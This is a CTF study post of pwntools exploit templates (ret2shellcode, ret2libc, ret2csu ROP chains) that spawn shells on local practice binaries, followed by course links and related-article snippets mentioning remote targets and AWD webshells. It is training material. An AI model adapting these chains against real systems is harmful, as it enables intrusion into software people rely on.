pwn的常用脚本

最新推荐文章于 2024-09-10 09:19:38 发布
最新推荐文章于 2024-09-10 09:19:38 发布
阅读量1k 收藏 16
点赞数 12
分类专栏: pwn 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/biu801/article/details/139665479
版权

ret2shellcode

#!/usr/bin/env python
from pwn import *
sh = process('./ret2shellcode')
shellcode = asm(shellcraft.sh())
buf2_addr = 0x804a080
sh.sendline(shellcode.ljust(112, 'A') + p32(buf2_addr))
sh.interactive()

 ret2text

from pwn import *
p=process('./ret2text')
addr=0x804863A
p.sendlineafter("anything?",'a'*112+p32(addr))
p.interactive()

ret2syscall (要用到ROPgadget

#!/usr/bin/env python
from pwn import *
p=process('./rop')
int_addr=0x8049421
bin_addr=0x80be408
pop_other_ret=0x806eb90
pop_eax_ret=0x80bb196
payload='a'*112+p32(pop_eax_ret)+p32(0xb)+p32(pop_other_ret)+p32(0)+p32(0)+p32(bin_addr)+p32(int_addr)
p.sendline(payload)
p.interactive()

ret2libc

有/bin/sh

#!/usr/bin/env python
from pwn import *
p=process('./ret2libc1')
bin_addr=0x8048720
sys_addr=0x8048460
payload='a'*112+p32(sys_addr)+p32(0x123)+p32(bin_addr)
p.sendline(payload)
p.interactive()

 调用gets来构造bin/sh

from pwn import *
p=process('./ret2libc2')
sys_addr=0x8048490
get_addr=0x8048460
bss_addr=0x804A080
payload = 'a'*112 +p32(get_addr)+p32(sys_addr)+p32(bss_addr)+p32(bss_addr)
p.sendline(payload)
p.sendline('/bin/sh')
p.interactive()

函数个参数都构造

#!/usr/bin/env python
from pwn import *
from LibcSearcher import *
elf=ELF('ret2libc3')
p=process('./ret2libc3')
puts_plt=elf.plt['puts']
puts_got=elf.got['puts']
start_addr = elf.symbols['_start']
#gdb.attach(p)
payload1='A'*112+p32(puts_plt)+p32(start_addr)+p32(puts_got)
p.sendlineafter("!?",payload1)
puts_addr=u32(p.recv(4))
libc=LibcSearcher('puts',puts_addr)
libcbase=puts_addr-libc.dump("puts")
print '='*10
print "libc_base="+hex(libcbase)
print '='*10
print "puts_addr="+hex(puts_addr)
print '='*10
print "libc_dump_puts="+hex(libc.dump('puts'))
print '='*10
system_addr=libcbase+libc.dump("system")
binsh_addr=libcbase+libc.dump("str_bin_sh")
payload2='A'*112+p32(system_addr)+p32(1234)+p32(binsh_addr)
p.sendlineafter("!?",payload2)
p.interactive()

ret2csu

不传参

from pwn import *
p=process('./level3')
sys_addr=0x4005B6
pay='a'*136+p64(sys_addr)
p.sendline(pay)
p.interactive()

只需要传参数

from pwn import *
from LibcSearcher import *
p=process('./level4')
elf=ELF('./level4')

sys_addr=p.recvuntil('\n')
sys_addr=int(sys_addr,16)
libc=LibcSearcher('system',sys_addr)
libc_base=sys_addr-libc.dump('system')
pop_rdi=0x04008b3
bin_sh=libc_base+libc.dump('str_bin_sh')
payload='a'*136+p64(pop_rdi)+p64(bin_sh)+p64(sys_addr)
p.sendline(payload)
p.interactive()

 

#!/usr/bin/env python
from pwn import *

libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')

p = process('./level4')
#p = remote('127.0.0.1',10001)

binsh_addr_offset = next(libc.search('/bin/sh')) -libc.symbols['system']
print "binsh_addr_offset = " + hex(binsh_addr_offset)

pop_ret_offset = 0x0000000000021102 - libc.symbols['system']
print "pop_ret_offset = " + hex(pop_ret_offset)

#pop_pop_call_offset = 0x00000000000f4739 - libc.symbols['system']
#print "pop_pop_call_offset = " + hex(pop_pop_call_offset)

print "\n##########receiving system addr##########\n"
system_addr_str = p.recvuntil('\n')
system_addr = int(system_addr_str,16)
print "system_addr = " + hex(system_addr)

binsh_addr = system_addr + binsh_addr_offset
print "binsh_addr = " + hex(binsh_addr)


pop_ret_addr = system_addr + pop_ret_offset
print "pop_ret_addr = " + hex(pop_ret_addr)

#pop_pop_call_addr = system_addr + pop_pop_call_offset
#print "pop_pop_call_addr = " + hex(pop_pop_call_addr)

p.recv()

payload = "\x00"*136 + p64(pop_ret_addr) + p64(binsh_addr) + p64(system_addr) 

#payload = "\x00"*136 + p64(pop_pop_call_addr) + p64(system_addr) + p64(binsh_addr) 

print "\n##########sending payload##########\n"
p.send(payload)

p.interactive()

 

#!python
#!/usr/bin/env python
from pwn import *
#context.log_level="debug"
elf = ELF('level5')
libc = ELF('libc.so.6')
p = process('./level5')

got_write = elf.got['write']
print "got_write: " + hex(got_write)
got_read = elf.got['read']
print "got_read: " + hex(got_read)

main = 0x400564

off_system_addr = libc.symbols['write'] - libc.symbols['system']
print "off_system_addr: " + hex(off_system_addr)

#rdi=  edi = r13,  rsi = r14, rdx = r15 
#write(rdi=1, rsi=write.got, rdx=4)
payload1 =  "\x00"*136
payload1 += p64(0x400606) + p64(0) +p64(0) + p64(1) + p64(got_write) + p64(1) + p64(got_write) + p64(8) # pop_junk_rbx_rbp_r12_r13_r14_r15_ret
payload1 += p64(0x4005F0) # mov rdx, r15; mov rsi, r14; mov edi, r13d; call qword ptr [r12+rbx*8]
payload1 += "\x00"*56
payload1 += p64(main)

p.recvuntil("Hello, World\n")

print "\n#############sending payload1#############\n"
p.send(payload1)
sleep(1)

write_addr = u64(p.recv(8))
print "write_addr: " + hex(write_addr)

system_addr = write_addr - off_system_addr
print "system_addr: " + hex(system_addr)

bss_addr=0x601028

p.recvuntil("Hello, World\n")

#rdi=  edi = r13,  rsi = r14, rdx = r15 
#read(rdi=0, rsi=bss_addr, rdx=16)
payload2 =  "\x00"*136
payload2 += p64(0x400606) + p64(0) + p64(0) + p64(1) + p64(got_read) + p64(0) + p64(bss_addr) + p64(16) # pop_junk_rbx_rbp_r12_r13_r14_r15_ret
payload2 += p64(0x4005F0) # mov rdx, r15; mov rsi, r14; mov edi, r13d; call qword ptr [r12+rbx*8]
payload2 += "\x00"*56
payload2 += p64(main)

print "\n#############sending payload2#############\n"
p.send(payload2)
sleep(1)

p.send(p64(system_addr))
p.send("/bin/sh\0")
sleep(1)

p.recvuntil("Hello, World\n")

#rdi=  edi = r13,  rsi = r14, rdx = r15 
#system(rdi = bss_addr+8 = "/bin/sh")
payload3 =  "\x00"*136
payload3 += p64(0x400606) + p64(0) +p64(0) + p64(1) + p64(bss_addr) + p64(bss_addr+8) + p64(0) + p64(0) # pop_junk_rbx_rbp_r12_r13_r14_r15_ret
payload3 += p64(0x4005F0) # mov rdx, r15; mov rsi, r14; mov edi, r13d; call qword ptr [r12+rbx*8]
payload3 += "\x00"*56
payload3 += p64(main)

print "\n#############sending payload3#############\n"

sleep(1)
p.send(payload3)

p.interactive()

 ROPgadget

视频:【pwn】CTF学习:7、ret2csu补充 | BROP_哔哩哔哩_bilibili

文件: 百度网盘 请输入提取码 

文件:Intermediate ROP · 语雀

ret2_dl_runtime_resolve

视频: 【pwn】CTF学习:8、ret2_dl_runtime_resolve | 栈迁移原理_哔哩哔哩_bilibili

文件:Advanced ROP · 语雀

SROP

视频:【pwn】CTF学习:9、SROP_哔哩哔哩_bilibili

文件:百度网盘 请输入提取码

Stack smash

视频:【pwn】CTF学习:10、Stack smash | partial overwrite_哔哩哔哩_bilibili

格式化字符串

视频:【pwn】CTF学习:11、格式化字符串漏洞_哔哩哔哩_bilibili

cyclic

他是pwndbg的一个工具, 用来计算栈的大小

我么输入: cyclic 200

把输出的东西在gdb中输入进去,得到报错的地址

然后输入: cyclic -l -0x2349

即可得到栈大小

推荐

yichen小菜鸡的个人空间-yichen小菜鸡个人主页-哔哩哔哩视频

全网最硬核PWN入门_图解分析_pwn largbin图解-优快云博客

yichen的信安知识库 · 语雀

tips:
1.  retn指令实际就是执行了一次pop eip 然后esp+4 紧接着开始执行eip指向的地址

1.pwn基础总结
admin的博客
10-03 1万+
Int_overflow # Int_overflow context(log_level='debug', os='Linux', arch='amd64') p = remote("pwn.blackbird.wang", 9501) payload = "2147483648" p.sendlineafter("Input an int ( <0 )\n", payload) p.interactive() ret2text from pwn import * conte.
kernel pwn
nelson11112的博客
04-11 3713
比赛中的kernel pwn 比赛中我们会得到下面几个文件 正在上传…重新上传取消 bzImage 这是一个内核编译生成的压缩内核映像 core.cpio这是一个文件管理系统 针对core.cpio会有一系列常规操作 mkdir core cd core mv ../core.cpio core.cpio.gz // cp ../core.cpio core.cpio.gz gunzip core.cpio.gz cpio -idmv < core.cpio 然后我们在core..
pwntools解题脚本模板
半岛铁盒的博客
02-23 1402
一.栈溢出 from pwn import * r = remote("111.198.29.45", 34012) #连接指定IP及端口,题目给定 payload = 'A' * 0x80 + 'a' * 0x8 + p64(0x00400596)#发送数据,输入数据溢出,并覆盖,返回到目标位置 r.recvuntil("字符串") #运行到字符串位置停下 r.sendline(payload) #发送 payload r.interactive()
pwnscripts:非常简单的脚本可以加快二进制漏洞利用程序的创建
05-06
pwnscripts(0.6.0) 非常简单的脚本,可以加快二进制漏洞利用程序的创建。 要使用,请pip install pwnscripts或运行 git clone https://github.com/152334H/pwnscripts cd pwnscripts pip install -e . 并将from pwn import *替换from pwn import * from pwnscripts import * ,例如 from pwnscripts import * context . binary = './my_challenge' ... 另外, libc_database()扩展需要 。 您可能需要查看user_tests_and_examples.py中的一些示例。 特征 Pwnscripts具有许多不同的功能。 图书馆 像之类的总是感到不完整。
初识 pwn(get_shell、hello_pwn
Welcome To Myon'Blog !
04-01 1398
初识pwn、get_shell、hello_pwn、软件保护机制、exp脚本编写、pwntools、NX、IDA pro
PWN收发脚本例子
kelxLZ的博客
06-12 507
from pwn import * context.arch = 'amd64' def debug(addr,PIE=True): text_base = int(os.popen("pmap {}| awk '{{print $1}}'".format(p.pid)).readlines()[2], 16) if PIE: info("b* " + hex(text_base+addr)) gdb.attach(p,'b *{}'.format(h
PWN入门之通用gadgets
weixin_44681716的博客
04-09 3103
实验目的 针对一些程序运行时的初始化函数(如加载libc.so的初始化函数),提取一些通用的gadgets,从而更利于我们继续ROP操作。 实验文件 这次实验的可执行文件文件通过我们自己编译一个程序产生,为了降低实验的难度,我们在进行编译的时候,关闭栈保护和数据执行保护(DEP)。 ...
pwn环境搭建_GitHub - Who1sCarl/pwnenv: CTF PWN 环境搭建脚本
weixin_42311979的博客
12-29 404
Pwnenv - PWN environment toolkitCTF PWN 环境搭建脚本IntroductionTest environmentVm:parallels desktop 版本 15.1.2 (47123)Os:carlstar@pwn:~$ uname -aLinux pwn 4.13.0-36-generic #40~16.04.1-Ubuntu SMP Fri Feb 16...
awd的批量脚本 pwn_CTF线下赛AWD套路小结
weixin_39784972的博客
12-20 1888
CTF线下赛AWD套路小结本文已在先知社区发表,欢迎访问,链接h最近打了2场CTF线下赛,把AWD模式中的一些小套路做一些总结,本人web狗,二进制部分就不班门弄斧了。一、AWD模式简介AWD:Attack With Defence,比赛中每个队伍维护多台服务器,服务器中存在多个漏洞,利用漏洞攻击其他队伍可以进行得分,修复漏洞可以避免被其他队伍攻击失分。一般分配Web服务器,服务器(多数为Linu...
pwn100题目文件及exp.zip
08-09
在实践中,分析`pwn100.dms`的二进制文件,理解其执行流程,找到可以触发溢出的输入点,然后编写`pwn100_exp1.py`这样的脚本来生成并发送payload,是解决这个问题的关键步骤。同时,对于初学者来说,理解这些概念并...
一键搭建pwn环境脚本
03-25
一键搭建pwn环境脚本,安装pwntools, libc-database,vim, ropper, ROPgadget,libc-debug,ssh, one_gadget, pwndbg + pwngdb, 。其中pwntools为python3库 使用方法: chmod +x init_pwn.sh ./init_pwn.sh
PWN入门学习
qq_20254219的博客
10-20 2818
基础PWN知识入门 二进制基础 ​ 从C源代码到可执行文件的生成过程 ​ 可执行文件广义上的可执行文件,文件本身是没有执行权限的,和用户权限无关。可以通过命令给文件赋权。 ELF的执行​ 需要将在磁盘上的程序载入内存中。 在磁盘中的是节,映射到内存就是段。 在执行过程中,存储在磁盘中具有相同权限的节会被映射到内存中合成一个段。进程虚拟地址空间​ 操作系统管理所有硬件,程序
在Linux中编写python脚本的基本操作(pwn学习)
EpiphanyGod的博客
09-06 447
在学习pwn中,在Linux中编写python脚本是解决pwn问题的基础,也是入门,下面来介绍在pwn学习中编写python脚本的基础操作。1.用vim指令新建或者打开一个以.py为后缀的文件。vim exp.py2.基本模式普通模式:在vim指令进入一个编辑框后,默认模式就是普通模式,可以移动光标和执行命令。插入模式:按 i 进入插入模式,可以进行脚本的编辑。(编辑后按esc键可以转换到普通模式)。命令模式:按 : 进入命令模式,可以执行命令的操作。3.编辑脚本的保存与退出。
PWN入门(2)利用缓冲区溢出绕过登录和第一个PwnTools脚本
Ba1_Ma0的博客
09-08 1565
有什么不会或者是错误的地方的可以私信我,看到必回。
pwn题模板
2302_79813730的博客
09-10 542
pwn题模板,定义了一些简化函数。
【笔记】pwn模板
weixin_43960998的博客
02-21 676
今天在一个师傅博客中学到了一种当本地 libc 和远程 libc 不一样,调试和 getshell 之间需要切换的情况下,这种模板就会很简单。拿过来结合自己之前用的如下: from pwn import * import sys context.log_level = "debug" elf = ELF("./pwn") if sys.argv[1] == "process": p = process("./pwn") libc = ELF("/lib/x86_64-linux-gnu/li
CTF-PWN练习之通用跳转技术
ChuMeng1999的博客
01-06 2400
目录预备知识一、相关实验二、strdup函数三、grep命令实验目的实验环境实验步骤一源码审计实验步骤二使用gdb调试程序实验步骤三发起溢出攻击 预备知识 一、相关实验 本实验要求您已经认真学习和完成了《CTF PWN练习之绕过返回地址限制》。 二、strdup函数 strdup可以用于复制一个字符串,我们通常使用字符串时会使用strcpy,这要求已经定义好了一个接收缓冲区。而strdup只接受一个参数,也就是要复制的字符串的地址,strdup()会先用malloc()配置与参数字符串相同大小的的空间,然后
基于pwntools编写pwn代码
Yale的博客
12-26 1591
0x01 Pwntools安装,一条命令就能搞定 pip install --upgrade pwntools 安装完毕后在python环境下只需使用 from pwn import * 即可导入 这会将大量的功能导入到全局命名空间,然后我们就可以直接使用单一的函数进行汇编、反汇编、pack,unpack等操作。 常用的模块有下面几个: asm : 汇编与反汇编,支持x86/x64/arm/mip...
awd的批量脚本 pwn_北极星杯 awd复现
weixin_39811101的博客
01-12 1059
北极星杯 awd复现服务器共有3个web和一个pwnweb11,down下web1的源码,使用D盾扫描:2,漏洞1:发现三个冰蝎的木马,和一个一句话木马冰蝎的后门需要使用冰蝎的客户端进行连接:如图:一句话木马直接使用菜刀或蚁剑连接即可:3,漏洞2:sqlhelper.php的反序列化漏洞:构造payload:class A{public $name;public $male;function __...
pwngdb常用命令nc
最新发布
01-16
### pwngdb 中与 `nc` 相关的常用命令 在处理网络漏洞利用(Pwning)的过程中,`pwngdb` 是一个非常有用的 GDB 调试工具扩展包,能够简化调试过程并提供额外的功能。对于涉及网络连接的任务,特别是当需要通过 `...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值